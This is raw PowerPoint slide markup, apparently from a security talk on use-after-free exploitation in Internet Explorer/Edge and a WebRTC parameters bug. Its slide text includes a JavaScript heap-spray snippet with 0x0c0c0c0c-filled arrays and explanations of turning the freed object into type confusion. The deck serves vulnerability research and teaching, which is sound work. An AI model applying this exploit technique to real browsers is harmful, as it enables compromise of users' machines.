              <a:off x="15112129" y="11385107"/>
              <a:ext cx="2240998" cy="4494"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="组合 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C7BE00-00B5-4D99-B87C-FFC9CD20F074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1398018" y="935295"/>
            <a:ext cx="10313668" cy="862857"/>
            <a:chOff x="383732" y="909324"/>
            <a:chExt cx="12098995" cy="1172077"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="平行四边形 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2477FEC-3568-49DF-99C9-5082E3EE1699}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="383732" y="909324"/>
              <a:ext cx="1629722" cy="1172077"/>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01</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="平行四边形 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1DC4EC3-1A36-489E-B0FE-3ED93005887A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1853032" y="909324"/>
              <a:ext cx="10629695" cy="1172077"/>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Historical Review of UAF </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Exploits Under IE/Edge</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6646858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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F387EEAF-99BC-4E31-813E-CF7D11576620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="2550693"/>
            <a:ext cx="10953455" cy="7025353"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CollectGarbage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>var start = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Date.now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>while(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Date.now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>() - start &lt; 2000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>zz2 = new Array(0x80000);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>for(var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=0;i&lt;0x80000;i++){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    zz2[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>] = new Array(0x10);  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    for (var j=0;j&lt;0x10;j++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        zz2[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>][j] = 0x0c0c0c0c;  		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//occupy dynamic objects with segments containing 0x0c0c0c0c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The program crashes in the following location</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCD93639-BAB4-4710-AED8-3397465AF82B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078123" y="7130274"/>
            <a:ext cx="10953454" cy="1008447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03EC08A3-C1BF-4E06-8115-3A5660BF8E03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078123" y="8423049"/>
            <a:ext cx="10953454" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>segmemt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> of an array of integers occupies the position of the original dynamic object, and can achieve type confusion by faking objects in the data part.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{032C0620-89F0-491E-8359-5691B2116AD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993450" y="7800531"/>
            <a:ext cx="3038130" cy="42362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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22387382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sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{984B4AB9-3CD1-4C68-A624-1CA61D979029}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2528416"/>
            <a:ext cx="4541625" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>Original dynamic object</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="连接符: 肘形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ABC13F0-DEAE-40B2-892C-784443CA47EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="24" idx="3"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8516934" y="3306802"/>
            <a:ext cx="1920882" cy="775343"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7879"/>
              <a:gd name="adj2" fmla="val 129794"/>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F001BCBC-67A9-41CB-A64A-4898F5085052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8819633" y="3306802"/>
            <a:ext cx="3236366" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetScriptType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> considers the memory area to be a dynamic object, the first Qword is a virtual table pointer, and the second Qword is a Type</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="连接符: 肘形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E67328B-207E-4DE4-B9B8-EB53AC4B940F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="25" idx="3"/>
            <a:endCxn id="19" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8488812" y="6092679"/>
            <a:ext cx="1834792" cy="976111"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5903"/>
              <a:gd name="adj2" fmla="val 123419"/>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9" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2435FCD8-9CF0-4CC3-8987-8FDA397808F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8705421" y="6092679"/>
            <a:ext cx="3236366" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After the integer array is occupied, the region is a segment of an integer array.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="图片 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F645264-EA24-4BEF-924B-CD90BE9D5031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3075489"/>
            <a:ext cx="7463228" cy="1966911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="图片 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20312AEC-AFE5-410D-8476-A5BE1596D7D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="5065715"/>
            <a:ext cx="7463228" cy="503768"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF60618-3B62-477A-8EBB-5B47B2EEE894}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047459" y="6053517"/>
            <a:ext cx="7441353" cy="1998055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7BB4C56-4029-48DA-8032-56ECE1089093}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053707" y="8092566"/>
            <a:ext cx="7435106" cy="462286"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2416EF90-B809-4398-A712-FBB79BBE2736}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053706" y="3304400"/>
            <a:ext cx="7463228" cy="155548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F3EAEFBB-2F9C-4A13-936D-2E4F53E199AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047459" y="6298504"/>
            <a:ext cx="7441353" cy="154057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E7B4F8A1-D3CC-428A-9ADB-1B4F76E222D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079143" y="5569587"/>
            <a:ext cx="4902557" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>After occupy</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2948289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03</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200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>WebRTC Parameters UAF Vulnerability Analysis: From UAF to Type Confusion</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E80B3C-6105-4C5B-99FF-5F5D2DBBE74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="4707960"/>
            <a:ext cx="10953455" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>At this point, by constructing a specific JS object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>feng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>shui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="SimHei" charset="-122"/>
              </a:rPr>
